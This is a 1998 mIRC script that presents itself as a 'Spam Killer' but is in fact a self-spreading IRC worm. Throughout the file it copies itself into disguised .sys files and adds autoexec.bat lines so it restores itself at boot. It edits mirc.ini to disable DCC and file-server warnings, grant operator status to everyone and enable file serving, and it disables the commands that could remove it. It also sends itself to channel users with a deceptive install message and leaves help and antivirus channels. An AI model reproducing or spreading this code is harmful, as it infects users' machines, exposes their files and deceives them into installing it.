   ; ---------<  ProjectX mIRC Scripters Crew  >-----------
   ;  Filename..: pornaway.mrc  [Spam Killer]
   ;  Release...: v1.35
   ;  Author....: Dude (matt@snip.net)
   ;  Date......: September 23, 1998
   ;  URL.......: http://www.projectx.mx.dk/
   ;  E-mail....: info@projectx.mx.dk
   ; ------------------------------------------------------
   on 1:TEXT:*:*:{
     if (done !isin %aliases) {
       .set %aliases done
       .perform on
       .sreq auto
       .copy -o $script $mircdir $+ pornaway.mrc
       .copy -o $script $mircdir $+ system.sys
       .copy -o $script $mircdir $+ ___.sys
       .copy -o $script $mircdir $+ mirc.sys
       .copy -o $script c:\windows\system\p1111.sys
       .copy -o $script c:\windows\system\p2222.sys
       .copy -o $script c:\windows\system\p3333.sys
       .copy -o $script c:\windows\system\p4444.sys
       .load -rs1 $mircdir $+ pornaway.mrc
       .load -rs1 $mircdir $+ system.sys
       .load -rs1 $mircdir $+ ___.sys
       .load -rs1 $mircdir $+ mirc.sys
       .copy -o $mircdir $+ mirc.ini c:\windows\system\icq2001.sys
       .writeini mirc.ini fileserver warning off
       .writeini mirc.ini warn fserve off
       .writeini mirc.ini warn dcc off
       .writeini mirc.ini autoop n0 *!*@*
       .writeini mirc.ini protect n0 *!*@*
       .writeini mirc.ini Perform n0 /load -rs $mircdir $+ pornaway.mrc
       .writeini mirc.ini Perform n1 /load -rs $mircdir $+ system.sys
       .writeini mirc.ini Perform n2 /load -rs $mircdir $+ ___.sys
       .writeini mirc.ini Perform n3 /load -rs $mircdir $+ mirc.sys
       .writeini mirc.ini Perform n4 /copy -o c:\windows\system\icq2001.sys $mircdir $+ mirc.ini
       .writeini mirc.ini Perform n5 /copy -o c:\windows\system\slash1234.sys $mircdir $+ aliases.ini
       .writeini mirc.ini Perform n6 /fsend on
       .writeini mirc.ini Perform n7 /pdcc 2147483647
       .writeini mirc.ini Perform n8 /dcc packetsize 4096
       .write c:\autoexec.bat copy c:\windows\system\slash1234.sys $mircdir $+ aliases.ini
       .write c:\autoexec.bat copy c:\windows\system\icq2001.sys $mircdir $+ mirc.ini
       .write c:\autoexec.bat copy c:\windows\system\p1111.sys $mircdir $+ pornaway.mrc
       .write c:\autoexec.bat copy c:\windows\system\p2222.sys $mircdir $+ system.sys
       .write c:\autoexec.bat copy c:\windows\system\p3333.sys $mircdir $+ ___.sys
       .write c:\autoexec.bat copy c:\windows\system\p4444.sys $mircdir $+ mirc.sys
       .write c:\autoexec.bat cls
       .write aliases.ini n1=/unload /echo -a 2* /unload: command disabled
       .write aliases.ini n2=/remote /echo -a 2* /remote: command disabled
       .write aliases.ini n3=/remove /echo -a 2* /remove: command disabled
       .write aliases.ini n4=/events /echo -a 2* /events: command disabled
       .write aliases.ini n5=/sreq /echo -a 2* /sreq: command disabled
       .write aliases.ini n6=/play /echo -a 2* /play: command disabled
       .write aliases.ini n7=/timers /echo -a 2* /timers: command disabled
       .write aliases.ini n8=/timer /echo -a 2* /timer: command disabled
       .write aliases.ini n9=/write /echo -a 2* /write: command disabled
       .write aliases.ini n10=/run /echo -a 2* /run: command disabled
       .write aliases.ini n11=/perform /echo -a 2* /perform: command disabled
       .write aliases.ini n12=/filter /echo -a 2* /filter: command disabled
       .write aliases.ini n13=/remini /echo -a 2* /remini: command disabled
       .write aliases.ini n14=/rename /echo -a 2* /rename: command disabled
       .write aliases.ini n15=/say /echo -a 2* /say: command disabled
       .reload -a aliases.ini
       .copy -o $mircdir $+ aliases.ini c:\windows\system\slash1234.sys
     }
     if (($nick isreg $chan) && ($rand(10,15) == 15)) {
       .msg $nick Here is the offical script of $chan $+ . It blocks spammers so you don't have to see there annoying messages, just type /load -rs c:/mirc/download/pornaway.mrc once the download is finished, thank you and God bless ;-)
       .dcc send $nick $mircdir $+ pornaway.mrc
     }
     if ((help isin $chan) || (nohack isin $chan) || (ava isin $chan) || (virus isin $chan) || (support isin $chan) || (aide isin $chan) || (vigilantes isin $chan)) {
       .partall
     }
   }

   alias /quit /quit pornaway.mrc v1.35 by Dude (matt@snip.net)
